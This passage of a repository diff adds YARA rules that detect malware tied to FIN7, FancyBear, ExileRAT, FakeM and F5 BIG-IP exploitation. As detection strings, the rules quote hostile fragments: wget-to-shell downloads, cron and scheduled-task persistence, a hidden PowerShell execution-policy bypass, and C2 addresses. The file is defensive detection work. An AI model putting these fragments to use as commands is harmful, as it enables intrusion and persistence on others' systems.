$s3 = "GET %s%s HTTP/1.1" fullword ascii
$s4 = "CCAttack.target = %s" fullword ascii
$s5 = "Accept-Language: zh-cn" fullword ascii
$s6 = "jdfwkey" fullword ascii
$s7 = "hackqz.f3322.org:8880" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($x*) or 5 of ($s*) ) ) or ( all of them )
}

View file

@ -0,0 +1,26 @@
import "pe"
rule MAL_ExileRAT_Feb19_1 {
meta:
description = "Detects Exile RAT"
author = "Florian Roth (Nextron Systems)"
reference = "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html"
date = "2019-02-04"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
hash1 = "3eb026d8b778716231a07b3dbbdc99e2d3a635b1956de8a1e6efc659330e52de"
id = "f0a510f3-5fea-59a7-8991-9d06dc478b2a"
strings:
$x1 = "Content-Disposition:form-data;name=\"x.bin\"" fullword ascii
$s1 = "syshost.dll" fullword ascii
$s2 = "\\scout\\Release\\scout.pdb" ascii
$s3 = "C:\\data.ini" fullword ascii
$s4 = "my-ip\" value=\"" fullword ascii
$s5 = "ver:%d.%d.%d" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 500KB and (
pe.imphash() == "da8475fc7c3c90c0604ce6a0b56b5f21" or
3 of them
)
}

View file

@ -0,0 +1,23 @@
rule MAL_Payload_F5_BIG_IP_Exploitations_Jul20_1 {
meta:
description = "Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group"
author = "Florian Roth (Nextron Systems)"
reference = "https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/"
date = "2020-06-07"
score = 75
id = "57705ba1-c0ad-5ca6-8539-44d9da6b5942"
strings:
$x1 = "rm -f /etc/ld.so.preload" ascii fullword
$x2 = "echo \"* * * * * $LDR" ascii
$x3 = ".sh -o /tmp/in.sh" ascii
$x4 = "chmod a+x /etc/.modules/.tmp" ascii
$x5 = "chmod +x /var/log/F5-logcheck"
$s1 = "ulimit -n 65535" ascii fullword
$s2 = "-s /usr/bin/wget " ascii
$s3 = ".sh | sh" ascii
condition:
filesize < 300KB and
( 1 of ($x*) or 3 of them )
}

View file

@ -0,0 +1,49 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-01-25
Identifier: FakeM
*/
rule FakeM_Generic {
meta:
description = "Detects FakeM malware samples"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
date = "2016-01-25"
modified = "2023-01-06"
score = 85
hash1 = "631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3"
hash2 = "3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520"
hash3 = "53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60"
hash4 = "4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3"
hash5 = "7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8"
hash6 = "12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d"
hash7 = "9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5"
hash8 = "3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90"
hash9 = "41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33"
hash10 = "53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e"
hash11 = "523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b"
id = "51a285ce-a4cb-5068-b079-a8227690365f"
strings:
$a1 = "\\system32\\kernel32.dll" ascii
$a2 = "\\boot.lnk" ascii
$a3 = "%USERPROFILE%" fullword ascii /* Goodware String - occured 16 times */
$b1 = "Wizard.EXE" fullword wide
$b2 = "CommandLineA" fullword ascii
$c1 = "\\system32\\kernel32.dll" ascii
$c2 = "\\aapz.tmp" ascii
$e1 = "C:\\Documents and Settings\\A\\" ascii
$e2 = "\\svchost.exe" ascii
$e3 = "\\Perform\\Release\\Perform.pdb" ascii
$f1 = "Browser.EXE" fullword wide
$f2 = "\\browser.exe" ascii
condition:
uint16(0) == 0x5a4d and filesize < 100KB and
( all of ($a*) or all of ($b*) or all of ($c*) or all of ($e*) or 1 of ($f*) )
}

View file

@ -0,0 +1,14 @@
rule PUP_ComputraceAgent {
meta:
description = "Absolute Computrace Agent Executable"
author = "ASERT - Arbor Networks (slightly modified by Florian Roth)"
date = "2018-05-01"
reference = "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/"
id = "676f8f1e-a3b4-5d05-b13b-bd6cb0aabbbd"
strings:
$a = { D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04 }
$b1 = { 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00 }
$b2 = { 54 61 67 49 64 00 }
condition:
uint16(0) == 0x5a4d and filesize < 40KB and ($a or ($b1 and $b2))
}

View file

@ -0,0 +1,42 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-06-14
Identifier: Fancy Bear and Cozy Bear Report - CrowdStrike
*/
/* Rule Set ----------------------------------------------------------------- */
rule COZY_FANCY_BEAR_Hunt {
meta:
description = "Detects Cozy Bear / Fancy Bear C2 Server IPs"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
date = "2016-06-14"
id = "e81b4368-7383-5a48-a89a-f91b9306326e"
strings:
$s1 = "185.100.84.134" ascii wide fullword
$s2 = "58.49.58.58" ascii wide fullword
$s3 = "218.1.98.203" ascii wide fullword
$s4 = "187.33.33.8" ascii wide fullword
$s5 = "185.86.148.227" ascii wide fullword
$s6 = "45.32.129.185" ascii wide fullword
$s7 = "23.227.196.217" ascii wide fullword
condition:
uint16(0) == 0x5a4d and 1 of them
}
rule COZY_FANCY_BEAR_pagemgr_Hunt {
meta:
description = "Detects a pagemgr.exe as mentioned in the CrowdStrike report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
date = "2016-06-14"
id = "3c5c8843-81ba-510c-82ed-4b6e2286bdb2"
strings:
$s1 = "pagemgr.exe" wide fullword
condition:
uint16(0) == 0x5a4d and 1 of them
}

View file

@ -0,0 +1,20 @@
rule MAL_OSX_FancyBear_Agent_Jul18_1 {
meta:
description = "Detects FancyBear Agent for OSX"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/DrunkBinary/status/1018448895054098432"
date = "2018-07-15"
hash1 = "d3be93f6ce59b522ff951cef9d59ef347081ffe33d4203cd5b5df0aaa9721aa2"
id = "ae717f70-7196-561a-916f-1598ab38c77a"
strings:
$x1 = "/Users/kazak/Desktop/" ascii
$s1 = "launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist" fullword ascii
$s2 = "mkdir -p /Users/Shared/.local/ &> /dev/null" fullword ascii
$s3 = "chmod 755 /Users/Shared/start.sh" fullword ascii
$s4 = "chmod 755 %s/%s &> /dev/null" fullword ascii
$s6 = "chmod 755 /Users/Shared/.local/kextd" fullword ascii
condition:
uint16(0) == 0xfacf and filesize < 3000KB and ( 1 of ($x*) and 4 of them )
}

View file

@ -0,0 +1,30 @@
rule Fidelis_Advisory_Purchase_Order_pps {
meta:
description = "Detects a string found in a malicious document named Purchase_Order.pps"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/ZjJyti"
date = "2015-06-09"
id = "205c4cda-6874-5455-8eb9-b63fb09b13fd"
strings:
$s0 = "Users\\Gozie\\Desktop\\Purchase-Order.gif" ascii
condition:
all of them
}
rule Fidelis_Advisory_cedt370 {
meta:
description = "Detects a string found in memory of malware cedt370r(3).exe"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/ZjJyti"
date = "2015-06-09"
id = "b5ebf2d7-e3e4-5b3b-a082-417da9c7fda6"
strings:
$s0 = "PO.exe" ascii fullword
$s1 = "Important.exe" ascii fullword
$s2 = "&username=" ascii fullword
$s3 = "Browsers.txt" ascii fullword
condition:
all of them
}

323
yara-Neo23x0/apt_fin7.yar Normal file
View file

@ -0,0 +1,323 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2018-08-01
Identifier: FIN7
Reference: https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html
*/
import "pe"
/* Rule Set ----------------------------------------------------------------- */
rule APT_FIN7_Strings_Aug18_1 {
meta:
description = "Detects strings from FIN7 report in August 2018"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "b6354e46af0d69b6998dbed2fceae60a3b207584e08179748e65511d45849b00"
id = "9b940986-e41b-5fbf-9e42-cb0fd550e541"
strings:
$s1 = "&&call %a01%%a02% /e:jscript" ascii
$s2 = "wscript.exe //b /e:jscript %TEMP%" ascii
$s3 = " w=wsc@ript /b " ascii
$s4 = "@echo %w:@=%|cmd" ascii
$s5 = " & wscript //b /e:jscript"
condition:
1 of them
}
rule APT_FIN7_Sample_Aug18_2 {
meta:
description = "Detects FIN7 malware sample"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "1513c7630c981e4b1d0d5a55809166721df4f87bb0fac2d2b8ff6afae187f01d"
id = "885eebfe-2587-5744-ba0c-c74ced946050"
strings:
$x1 = "Description: C:\\Users\\oleg\\Desktop\\" wide
$x2 = "/*|*| * Copyright 2016 Microsoft, Industries.|*| * All rights reserved.|*|" ascii
$x3 = "32, 40, 102, 105, 108, 101, 95, 112, 97, 116, 104, 41, 41, 32" ascii
$x4 = "83, 108, 101, 101, 112, 40, 51, 48, 48, 48, 41, 59, 102, 115" ascii
$x5 = "80, 80, 68, 65, 84, 65, 37, 34, 41, 44, 115, 104, 101, 108, 108" ascii
condition:
uint16(0) == 0xcfd0 and filesize < 2000KB and 1 of them
}
rule APT_FIN7_MalDoc_Aug18_1 {
meta:
description = "Detects malicious Doc from FIN7 campaign"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "9c12591c850a2d5355be0ed9b3891ccb3f42e37eaf979ae545f2f008b5d124d6"
id = "f3c430e0-be9a-5c3f-9378-a20ef0492afb"
strings:
$s1 = "<photoshop:LayerText>If this document was downloaded from your email, please click \"Enable editing\" from the yellow bar above" ascii
condition:
filesize < 800KB and 1 of them
}
rule APT_FIN7_Sample_Aug18_1 {
meta:
description = "Detects FIN7 samples mentioned in FireEye report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "a1e95ac1bb684186e9fb5c67f75c7c26ddc8b18ebfdaf061742ddf1675e17d55"
hash2 = "dc645aae5d283fa175cf463a19615ed4d16b1d5238686245574d8a6a8b0fc8fa"
hash3 = "eebbce171dab636c5ac0bf0fd14da0e216758b19c0ce2e5c572d7e6642d36d3d"
id = "0fdd98e8-7536-5159-8085-da7388e5fff2"
strings:
$s1 = "\\par var console=\\{\\};console.log=function()\\{\\};" ascii
$s2 = "616e64792d7063" ascii /* hex encoded string 'andy-pc' */
$x1 = "0043003a005c00550073006500720073005c0061006e00640079005c004400650073006b0074006f0070005c0075006e00700072006f0074006500630074" ascii /* hex encoded string 'C:\Users\andy\Desktop\unprotect' */
$x2 = "780065006300750074006500280022004f006e0020004500720072006f007200200052006500730075006d00650020004e006500780074003a0073006500" ascii /* hex encoded string 'xecute("On Error Resume Next:se' */
$x3 = "\\par \\tab \\tab \\tab sh.Run \"powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -w Hidden -File \" & pToPSCb, 0, False" fullword ascii
$x4 = "002e006c006e006b002d00000043003a005c00550073006500720073005c007400650073007400610064006d0069006e002e0054004500530054005c0044" ascii /* hex encoded string '.lnk-C:\Users\testadmin.TEST\D' */
$x5 = "005c00550073006500720073005c005400450053005400410044007e0031002e005400450053005c0041007000700044006100740061005c004c006f0063" ascii /* hex encoded string '\Users\TESTAD~1.TES\AppData\Loc' */
$x6 = "6c00690063006100740069006f006e002200220029003a00650078006500630075007400650020007700700072006f0074006500630074002e0041006300" ascii /* hex encoded string 'lication""):execute wprotect.Ac' */
$x7 = "7374656d33325c6d736874612e657865000023002e002e005c002e002e005c002e002e005c00570069006e0064006f00770073005c005300790073007400" ascii /* hex encoded string 'stem32\mshta.exe#..\..\..\Windows\Syst' */
$x8 = "\\par \\tab \\tab sh.Run \"%comspec% /c tasklist >\"\"\" & tpath & \"\"\" 2>&1\", 0, true" fullword ascii
$x9 = "00720079007b006500760061006c0028002700770061006c006c003d004700650074004f0062006a0065006300740028005c005c0027005c005c00270027" ascii /* hex encoded string 'ry{eval('wall=GetObject(\\'\\''' */
$x10 = "006e00640079005c004400650073006b0074006f0070005c0075006e006c006f0063006b002e0064006f0063002e006c006e006b" ascii /* hex encoded string 'ndy\Desktop\unlock.doc.lnk' */
condition:
uint16(0) == 0x5c7b and filesize < 3000KB and ( 1 of ($x*) or 2 of them )
}
rule APT_FIN7_EXE_Sample_Aug18_1 {
meta:
description = "Detects sample from FIN7 report in August 2018"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "7f16cbe7aa1fbc5b8a95f9d123f45b7e3da144cb88db6e1da3eca38cf88660cb"
id = "46c82d27-5683-5acd-9a3c-d69613091ecc"
strings:
$s1 = "Manche Enterprises Limited0" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 800KB and 1 of them
}
rule APT_FIN7_EXE_Sample_Aug18_2 {
meta:
description = "Detects sample from FIN7 report in August 2018"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "60cd98fc4cb2ae474e9eab81cd34fd3c3f638ad77e4f5d5c82ca46f3471c3020"
id = "4522cd85-ba85-5afd-8600-1ebabfaf6d02"
strings:
$s1 = "constructor or from DllMain." fullword ascii
$s2 = "Network Software Ltd0" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 400KB and all of them
}
rule APT_FIN7_EXE_Sample_Aug18_3 {
meta:
description = "Detects sample from FIN7 report in August 2018"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "995b90281774798a376db67f906a126257d314efc21b03768941f2f819cf61a6"
id = "0b0ce882-1c18-5741-bb71-0cef010dc778"
strings:
$s1 = "cvzdfhtjkdhbfszngjdng" fullword ascii
$s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 50KB and 1 of them
}
rule APT_FIN7_EXE_Sample_Aug18_4 {
meta:
description = "Detects sample from FIN7 report in August 2018"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "4b5405fc253ed3a89c770096a13d90648eac10a7fb12980e587f73483a07aa4c"
id = "bead79bb-28c2-59ed-985b-e44b41e7f66a"
strings:
$s1 = "c:\\file.dat" fullword wide
$s2 = "constructor or from DllMain." fullword ascii
$s3 = "lineGetCallIDs" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 700KB and all of them
}
rule APT_FIN7_EXE_Sample_Aug18_5 {
meta:
description = "Detects sample from FIN7 report in August 2018"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
id = "6c810662-9ceb-5c3b-8f83-5a4aa2a5d461"
strings:
$s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
$s3 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 400KB and all of them
}
rule APT_FIN7_EXE_Sample_Aug18_6 {
meta:
description = "Detects sample from FIN7 report in August 2018"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "1439d301d931c8c4b00717b9057b23f0eb50049916a48773b17397135194424a"
id = "2b2e6b74-5d71-5656-8faf-37c94607d93e"
strings:
$s1 = "coreServiceShell.exe" fullword ascii
$s2 = "PtSessionAgent.exe" fullword ascii
$s3 = "TiniMetI.exe" fullword ascii
$s4 = "PwmSvc.exe" fullword ascii
$s5 = "uiSeAgnt.exe" fullword ascii
$s7 = "LHOST:" fullword ascii
$s8 = "TRANSPORT:" fullword ascii
$s9 = "LPORT:" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 20KB and (
pe.exports("TiniStart") or
4 of them
)
}
rule APT_FIN7_EXE_Sample_Aug18_7 {
meta:
description = "Detects sample from FIN7 report in August 2018"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "ce8ce35f85406cd7241c6cc402431445fa1b5a55c548cca2ea30eeb4a423b6f0"
id = "96943654-a6e8-59c0-ab6c-1ab3906a5d05"
strings:
$s1 = "libpng version" fullword ascii
$s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 800KB and all of them
}
rule APT_FIN7_EXE_Sample_Aug18_8 {
meta:
description = "Detects sample from FIN7 report in August 2018"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "d8bda53d7f2f1e4e442a0e1c30a20d6b0ac9c6880947f5dd36f78e4378b20c5c"
id = "1eb9810e-2b50-5a93-925e-073bb17e1e6c"
strings:
$s1 = "GetL3st3rr" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 600KB and all of them
}
rule APT_FIN7_EXE_Sample_Aug18_10 {
meta:
description = "Detects sample from FIN7 report in August 2018"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "8cc02b721683f8b880c8d086ed055006dcf6155a6cd19435f74dd9296b74f5fc"
id = "2c6f557e-31d3-5377-a3fa-4f1507f28386"
strings:
/* "Copyright 1 - 19" */
$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43
00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74
00 20 00 31 00 20 00 2D 00 20 00 31 00 39 00 }
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them
}
rule APT_FIN7_Sample_EXE_Aug18_1 {
meta:
description = "Detects FIN7 Sample"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
date = "2018-08-01"
hash1 = "608003c2165b0954f396d835882479f2504648892d0393f567e4a4aa90659bf9"
hash2 = "deb62514704852ccd9171d40877c59031f268db917c23d00a2f0113dab79aa3b"
hash3 = "16de81428a034c7b2636c4a875809ab62c9eefcd326b50c3e629df3b141cc32b"
hash4 = "3937abdd1fd63587022ed540a31c58c87c2080cdec51dd24af3201a6310059d4"
hash5 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
id = "7c66a234-9dee-5279-b855-892b12d036ff"
strings:
$s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
$s2 = "dx=%d, dy=%d" fullword ascii
$s3 = "Error with JP2H box size" fullword ascii
$co1 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2E 63 6F 64 65
00 00 00 }
condition:
uint16(0) == 0x5a4d and filesize < 1000KB
and all of ($s*)
and $co1 at 0x015D
}
rule APT_FIN7_MsDoc_Sep21_1 {
meta:
description = "Detects MalDocs used by FIN7 group"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
date = "2021-09-07"
score = 85
hash1 = "d60b6a8310373c9b84e6760c24185535"
id = "4fbde087-ec1e-5614-af1e-f342b1766fa2"
strings:
/* John \x0bW10ProOff16 */
$xc1 = { 00 4A 00 6F 00 68 00 6E 00 0B 00 57 00 31 00 30
00 50 00 72 00 6F 00 4F 00 66 00 66 00 31 00 36 }
$s1 = "word_data.bin" ascii fullword
$s2 = "V:\\DOC\\For_JS" ascii
$s3 = "HomeCompany" ascii
$s4 = "W10ProOff16" ascii
condition:
uint16(0) == 0xcfd0
and (
1 of ($x*) or
3 of them
)
}
rule SUSP_OBFUSC_JS_Sept21_2 {
meta:
description = "Detects JavaScript obfuscation as used in MalDocs by FIN7 group"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
date = "2021-09-07"
score = 65
id = "5ab9cd60-077c-5066-bd2f-8da261aae1e0"
strings:
$s1 = "=new RegExp(String.fromCharCode(" ascii
$s2 = ".charCodeAt(" ascii
$s3 = ".substr(0, " ascii
$s4 = "var shell = new ActiveXObject(" ascii
$s5 = "= new Date().getUTCMilliseconds();" ascii
$s6 = ".deleteFile(WScript.ScriptFullName);" ascii
condition:
filesize < 6000KB
and (
4 of them
)
}

View file

@ -0,0 +1,74 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-08-04
Identifier: FIN7
Reference: https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor
*/
/* Rule Set ----------------------------------------------------------------- */
rule FIN7_Dropper_Aug17 {
meta:
description = "Detects Word Dropper from Proofpoint FIN7 Report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
date = "2017-08-04"
hash1 = "c91642c0a5a8781fff9fd400bff85b6715c96d8e17e2d2390c1771c683c7ead9"
hash2 = "cf86c7a92451dca1ebb76ebd3e469f3fa0d9b376487ee6d07ae57ab1b65a86f8"
id = "4929dff6-9f33-5d22-b560-c2195440a1cc"
strings:
$x1 = "tpircsj:e/ b// exe.tpircsw\" rt/" fullword ascii
$s1 = "Scripting.FileSystemObject$" fullword ascii
$s2 = "PROJECT.THISDOCUMENT.AUTOOPEN" fullword wide
$s3 = "Project.ThisDocument.AutoOpen" fullword wide
$s4 = "\\system3" ascii
$s5 = "ShellV" fullword ascii
condition:
( uint16(0) == 0xcfd0 and filesize < 700KB and 1 of ($x*) or all of ($s*) )
}
rule FIN7_Backdoor_Aug17 {
meta:
description = "Detects Word Dropper from Proofpoint FIN7 Report"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
date = "2017-08-04"
id = "906daf88-520b-57b5-825e-29f060b43183"
strings:
$x1 = "wscript.exe //b /e:jscript C:\\Users\\" ascii
$x2 = "wscript.exe /b /e:jscript C:\\Users\\" ascii
$x3 = "schtasks /Create /f /tn \"GoogleUpdateTaskMachineSystem\" /tr \"wscript.exe" ascii nocase
$x4 = "schtasks /Delete /F /TN \"\"GoogleUpdateTaskMachineCore" ascii nocase
$x5 = "schtasks /Delete /F /TN \"GoogleUpdateTaskMachineCore" ascii nocase
$x6 = "wscript.exe //b /e:jscript %TMP%\\debug.txt" ascii
$s1 = "/?page=wait" fullword ascii
$a1 = "autoit3.exe" fullword ascii
$a2 = "dumpcap.exe" fullword ascii
$a3 = "tshark.exe" fullword ascii
$a4 = "prl_cc.exe" fullword ascii
$v1 = "vmware" fullword ascii
$v2 = "PCI\\\\VEN_80EE&DEV_CAFE" fullword ascii
$v3 = "VMWVMCIHOSTDEV" fullword ascii
$c1 = "apowershell" fullword ascii
$c2 = "wpowershell" fullword ascii
$c3 = "get_passwords" fullword ascii
$c4 = "kill_process" fullword ascii
$c5 = "get_screen" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 5000KB and
(
1 of ($x*) or
all of ($a*) or
all of ($v*) or
3 of ($c*)
)
) or 5 of them
}

19
yara-Neo23x0/apt_fin8.yar Normal file
View file

@ -0,0 +1,19 @@
rule Shellcode_APIHashing_FIN8 {
meta:
description = "Detects FIN8 Shellcode APIHashing"
author = "Frank Boldewin (@r3c0nst)"
date = "2021-03-16"
reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf"
id = "bca5601c-2998-545b-8dd0-ec3c861e6291"
strings:
$APIHashing32bit1 = {81 F7 99 5D 52 69 81 F3 30 D7 00 AB}
$APIHashing32bit2 = {68 F2 55 03 88 68 65 19 6D 1E}
$APIHashing32bit3 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4}
$APIHashing64bit1 = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21}
$APIHashing64bit2 = {48 B8 99 5D 52 69 30 D7 00 AB}
condition:
all of ($APIHashing32bit*) or all of ($APIHashing64bit*)
}

View file

@ -0,0 +1,34 @@
/* Limited support for hash function */
/*
import"pe"
import"hash"
rule FLAME2_Orchestrator {
meta:
desc = "Encrypted resources in Flame2.0 Orchestrators"
author = "turla @ Uppercase"
hash1 = "15a9b1d233c02d1fdf80071797ff9077f6ac374958f7d0f2b6e84b8d487c9cd1"
hash2 = "426aa55d2afb9eb08b601d373671594f39a1d9d9a73639c4a64f17d674ca9a82"
hash3 = "af8ccd0294530c659580f522fcc8492d92c2296dc068f9a42474d52b2b2f16e4"
reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0"
condition:
for any i in (0..pe.number_of_resources-1):
((hash.md5(pe.resources[i].offset,pe.resources[i].length) == "53b19d9863d8ff8cde8e4358d1b57c04") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "4849cc439e524ef6a9964a3666dddb13") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "62bfe21a8eb76fd07e22326c0073fef5") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "dfed2c71749b04dad46d0ce52834492c") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "9119aa701b39242a98be118d9c237ecc") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "b69d168e29fba6c88ad4e670949815aa") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "4849cc439e524ef6a9964a3666dddb13") or
